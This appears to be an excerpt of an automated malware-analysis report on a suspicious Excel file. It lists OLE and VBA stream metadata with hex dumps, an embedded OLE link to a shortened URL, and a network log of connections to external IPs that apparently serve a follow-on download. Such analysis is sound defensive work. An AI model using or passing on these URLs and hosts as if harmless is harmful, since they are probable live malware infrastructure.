                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                      General
                      Stream Path:\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:200
                      Entropy:3.2920681057018664
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . b . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                      General
                      Stream Path:MBD0020109B/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:244
                      Entropy:2.701136490257069
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                      General
                      Stream Path:MBD0020109B/\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:220
                      Entropy:3.3813251513223976
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                      General
                      Stream Path:MBD0020109B/MBD000673C0/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.219515110876372
                      Base64 Encoded:False
                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD000673C0/Package
                      CLSID:
                      File Type:Microsoft Excel 2007+
                      Stream Size:17987
                      Entropy:7.459551056433264
                      Base64 Encoded:True
                      Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD00083EA7/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.219515110876372
                      Base64 Encoded:False
                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD00083EA7/Package
                      CLSID:
                      File Type:Microsoft Excel 2007+
                      Stream Size:14238
                      Entropy:7.30552548787177
                      Base64 Encoded:True
                      Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD000846C9/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD000846C9/\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:708
                      Entropy:3.6235698530352805
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD000846C9/\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:372
                      Entropy:2.913345911478729
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD000846C9/Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:97808
                      Entropy:7.365095307579232
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      General
                      Stream Path:MBD0020109B/MBD0018D4CE/\x1Ole
                      CLSID:
                      File Type:data
                      Stream Size:20
                      Entropy:0.5689955935892812
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/MBD0018D4CE/\x3ObjInfo
                      CLSID:
                      File Type:data
                      Stream Size:4
                      Entropy:0.8112781244591328
                      Base64 Encoded:False
                      Data ASCII:. . . .
                      Data Raw:00 00 03 00
                      General
                      Stream Path:MBD0020109B/MBD0018D4CE/Contents
                      CLSID:
                      File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                      Stream Size:197671
                      Entropy:6.989042939766534
                      Base64 Encoded:True
                      Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD0020109B/Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:386813
                      Entropy:7.815032759709734
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      General
                      Stream Path:MBD0020109C/\x1Ole
                      CLSID:
                      File Type:data
                      Stream Size:776
                      Entropy:4.802068165751094
                      Base64 Encoded:False
                      Data ASCII:. . . . . . S b H . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . 6 . r . u . X . k . f . g . h . ? . & . s . h . e . r . r . y . = . s . t . r . a . n . g . e . & . o . c . t . a . g . o . n . = . f . r . a . g . i . l . e . & . i . n . i . t . i . a . t . i . v . e . = . r . o . u . g . h . & . c . o . r . s . a . g . e . . . & . . \\ . 0 . 4 ` _ ' E _ & . M _ M h . . t t . . . i : . 1 Q U . ] 7 @ $ % } . V . c . . . .
                      Data Raw:01 00 00 02 03 13 bd 53 f8 62 f3 48 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 36 00 72 00 75 00 58 00 6b 00 66 00 67 00 68 00 3f 00 26 00 73 00 68 00 65 00 72 00 72 00 79 00 3d 00 73 00 74 00
                      General
                      Stream Path:Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:347601
                      Entropy:7.998744757425568
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . n 9 M . w d 9 t / . M 5 . N . 8 . 9 ; . . . L . . . . . . . . . . . . . \\ . p . F o . a ! | . . K . [ . z E . . | t T . S . j l { ' X . . j 3 . . ? S . b ~ 8 @ - 7 . j k v L . 0 . @ _ V l e . ] Y , z 7 ( f B . . . a . . . . . . = . . . O - J g ( . . . G r q A . 3 . ` l R . . . . . . . . . . . . . . . . . . A . . . E , . . . { n = . . . % 9 ' S @ . . . . . . 5 " . . . } . . . . 9 x . . . @ P . . . X 1 . . . . . Y j . 9 . F b : 0 . / . ? 1 . . . l _ . .
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 87 6e 91 fe 39 4d e7 a2 c9 0d f4 77 64 39 95 c1 74 9d 2f 1c c3 e1 4d 35 dd f5 13 4e ba 85 b6 7f a2 b3 38 9c 08 39 3b 02 18 d7 cd d5 00 9d 4c ac 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 ec cd e2 00 00 00 5c 00 70 00 9b 46 f9 6f 0a b7 61 aa a9 21 7c 0f 04 8b 4b 10 5b 84 10 7a bc 45 f3 8c de 86
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                      CLSID:
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:527
                      Entropy:5.252006696625403
                      Base64 Encoded:True
                      Data ASCII:I D = " { 6 B D B A A 9 7 - 2 C 9 1 - 4 B 1 F - B D E A - F D F 5 5 4 6 A 5 F 8 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 2 A 0 F 3 2 5 C 3 2 9 C 3 2 9 C
                      Data Raw:49 44 3d 22 7b 36 42 44 42 41 41 39 37 2d 32 43 39 31 2d 34 42 31 46 2d 42 44 45 41 2d 46 44 46 35 35 34 36 41 35 46 38 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                      CLSID:
                      File Type:data
                      Stream Size:104
                      Entropy:3.0488640812019017
                      Base64 Encoded:False
                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                      CLSID:
                      File Type:data
                      Stream Size:2644
                      Entropy:3.986468125925358
                      Base64 Encoded:False
                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                      CLSID:
                      File Type:data
                      Stream Size:553
                      Entropy:6.360654450583106
                      Base64 Encoded:True
                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . ` i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 04 60 93 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 9, 2025 18:46:55.412368059 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:55.412476063 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:55.412560940 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:55.412841082 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:55.412864923 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.313486099 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.313656092 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.317128897 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.317162037 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.317517996 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.317573071 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.317946911 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.359358072 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.874145985 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.874233961 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.874285936 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.874285936 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.886389017 CET49753443192.168.2.414.103.79.10
                      Jan 9, 2025 18:46:56.886434078 CET4434975314.103.79.10192.168.2.4
                      Jan 9, 2025 18:46:56.887881041 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:56.892745972 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:56.892827988 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:56.892931938 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:56.897763014 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449059010 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449085951 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449110031 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449120998 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.449125051 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449140072 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449151039 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.449157000 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449167967 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.449172974 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449187994 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449206114 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449212074 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.449223042 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.449229956 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.449246883 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.449268103 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.454076052 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.454108953 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.454128981 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.454154968 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.535758972 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.535784960 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.535801888 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.535818100 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.535820007 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.535834074 CET8049755192.3.27.144192.168.2.4
